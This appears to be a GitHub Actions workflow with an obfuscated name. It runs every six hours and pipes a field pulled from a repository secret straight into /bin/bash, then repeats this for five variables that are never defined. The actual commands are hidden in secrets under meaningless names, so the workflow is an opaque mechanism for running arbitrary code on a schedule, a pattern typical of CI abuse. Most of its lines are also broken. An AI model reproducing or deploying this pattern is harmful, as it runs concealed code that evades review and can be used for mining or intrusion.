name: rendageng7890
on:
  workflow_dispatch:
  schedule:
    - cron: '0 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: rendageng7890
        env:
          p14: ${{ secrets.p14 }}
        run: |
          echo $p14 | jq -r .d1939 | /bin/bash
          echo $ye7 | jq -r .gq69 | /bin/bash
          echo $od1226 | jq -r .lbosn26 | /bin/bash
          echo $w0 | jq -r .bem2316 | /bin/bash
          echo $zg51 | jq -r .c2415 | /bin/bash
          echo $we984 | jq -r .f2 | /bin/bash

